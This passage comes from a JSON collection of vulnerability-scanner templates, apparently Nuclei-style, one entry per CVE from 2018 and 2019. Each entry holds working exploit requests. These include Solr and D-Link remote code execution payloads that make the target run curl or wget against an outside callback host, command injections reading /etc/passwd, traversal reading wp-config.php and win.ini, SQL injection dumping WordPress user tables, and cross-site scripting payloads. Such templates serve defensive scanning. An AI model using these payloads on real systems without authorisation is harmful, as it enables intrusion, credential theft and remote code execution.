{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20210","info":{"name":"WordPress CTHthemes - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","/wp-content/themes/citybook"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8390","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=\n","POST /index.php/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch[keywords]=e\"><script>alert(document.domain)</script>&search_by_extrafields[]=9\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","alert alert-info alert-search-result"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"login\\[_csrf_token\\]\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-17558","info":{"name":"Apache Solr <=8.3.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","POST /solr/{{core}}/config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"update-queryresponsewriter\": {\n      \"startup\": \"lazy\",\n      \"name\": \"velocity\",\n      \"class\": \"solr.VelocityResponseWriter\",\n      \"template.base.dir\": \"\",\n      \"solr.resource.loader.enabled\": \"true\",\n      \"params.resource.loader.enabled\": \"true\"\n    }\n}\n","GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-5127","info":{"name":"YouPHPTube Encoder 2.3 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png","{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg","{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/objects/{{filename}}.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12314","info":{"name":"Deltek Maconomy 2.2.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6715","info":{"name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","severity":"high"},"requests":[{"raw":["PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https://rfi.nessus.org/rfi.txt\"}\n"],"matchers":[{"type":"word","part":"body","words":["TmVzc3VzQ29kZUV4ZWNUZXN0"]}]}]},{"id":"CVE-2019-20085","info":{"name":"TVT NVMS 1000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10692","info":{"name":"WordPress Google Maps <7.11.18 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_login\"","\"user_pass\"","\"user_nicename\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1943","info":{"name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"server","words":["GoAhead-Webs"]},{"type":"regex","part":"header","regex":["(?i)Location:\\shttps?:\\/\\/interact\\.sh/cs[\\w]+/"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2019-0193","info":{"name":"Apache Solr DataImportHandler <8.2.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\ncommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-11370","info":{"name":"Carel pCOWeb <B1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /config/pw_snmp_done.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n","GET /config/pw_snmp.html HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'value=\\\"\\\"><script>alert(document.domain)</script>\\\"></td>')"],"condition":"and"}]}]},{"id":"CVE-2019-3402","info":{"name":"Jira < 8.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'<script>alert(1)</script>' does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1653","info":{"name":"Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/config.exp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sysconfig"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13462","info":{"name":"Lansweeper Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["~lansweeperdb~"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-14974","info":{"name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["url = window.location.search.split(\"?desktop_url=\")[1]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15859","info":{"name":"Socomec DIRIS A-40 Devices Password Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.jsn"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/json"]},{"type":"word","part":"body","words":["username","password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19824","info":{"name":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /boafrm/formSysCmd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-17418","info":{"name":"MetInfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13396","info":{"name":"FlightPath - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncallback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["idden' name='form_token' value='([a-z0-9]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-16313","info":{"name":"ifw8 Router ROM v4.31 - Credential Discovery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/action/usermanager.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"],"part":"body"}]}]},{"id":"CVE-2019-14223","info":{"name":"Alfresco Share - Open Redirect","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/share/page/dologin"],"body":"success=%2Fshare%2Fpage%2F&failure=:\\\\interact.sh&username=baduser&password=badpass\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"]}]}]},{"id":"CVE-2019-19134","info":{"name":"WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["foo\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12583","info":{"name":"Zyxel ZyWall UAG/USG - Account Creation Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time.cgi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["free_time_redirect.cgi?u=","&smsOnly=0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7543","info":{"name":"KindEditor 4.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/kindeditor/php/demo.php","{{BaseURL}}/php/demo.php"],"body":"content1=</script><script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-16920","info":{"name":"D-Link Routers - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}\n\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\\\Windows\\\\win.ini')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17270","info":{"name":"Yachtcontrol Webapplication 1.0 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7719","info":{"name":"Acrolinx Server <5.2.5 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19751","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/ssl-fields/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test\n","GET /admin/ssl-fields/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1335","info":{"name":"Apache Tika <1.1.8-  Header Command Injection","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/meta"],"body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");","headers":{"X-Tika-OCRTesseractPath":"cscript","X-Tika-OCRLanguage":"//E:Jscript","Expect":"100-continue","Content-type":"image/jp2","Connection":"close"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: text/csv"]},{"type":"word","part":"body","words":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.gdal.GDALParse"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5230","info":{"name":"Atlassian Jira Confluence - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iframe src=\"javascript:alert(document.domain)\">","confluence"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18608","info":{"name":"DedeCMS 5.7 SP2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>","DedeCMS Error Warning!"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20608","info":{"name":"Imcat 4.4 - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2018-6530","info":{"name":"D-Link - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nSOAPAction: \"whatever-serviceType#whatever-action\"\nContent-Type: text/xml\n\nwhatever-content\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2018-17254","info":{"name":"Joomla! JCK Editor SQL Injection","severity":"critical"},"requests":[{"raw":["GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-19326","info":{"name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-3238","info":{"name":"Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Variables.cs_imagedir"],"condition":"and"}]}]},{"id":"CVE-2018-3714","info":{"name":"node-srv - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/node_modules/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14474","info":{"name":"Orange Forum 1.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=http://interact.sh/?app.scan/","{{BaseURL}}/signup?next=http://interact.sh/?app.scan/"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-11759","info":{"name":"Apache Tomcat JK Connect <=1.2.44 - Manager Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jkstatus","{{BaseURL}}/jkstatus;"],"matchers-condition":"and","matchers":[{"type":"word","words":["JK Status Manager"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1271","info":{"name":"Spring MVC Framework - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini","{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16288","info":{"name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18570","info":{"name":"Planon <Live Build 41 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20010","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider-account.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=\n","GET /assets/ssl-accounts.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-14931","info":{"name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-14728","info":{"name":"Responsive filemanager 9.13.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/filemanager/upload.php"],"body":"fldr=&url=file:///etc/passwd","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-14064","info":{"name":"VelotiSmart Wifi - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15517","info":{"name":"D-Link Central WifiManager - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-10201","info":{"name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini","{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini","{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-7422","info":{"name":"WordPress Site Editor <=1.1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php","{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-16716","info":{"name":"NCBI ToolBox - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12634","info":{"name":"CirCarLife Scada <4.3 - System Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/log"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","words":["user.debug","user.info","EVSE"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19877","info":{"name":"Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>confirm(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7662","info":{"name":"CouchCMS <= 2.0 - Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/mysql2i/mysql2i.func.php","{{BaseURL}}/addons/phpmailer/phpmailer.php"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["mysql2i.func.php on line 10","Fatal error: Cannot redeclare mysql_affected_rows() 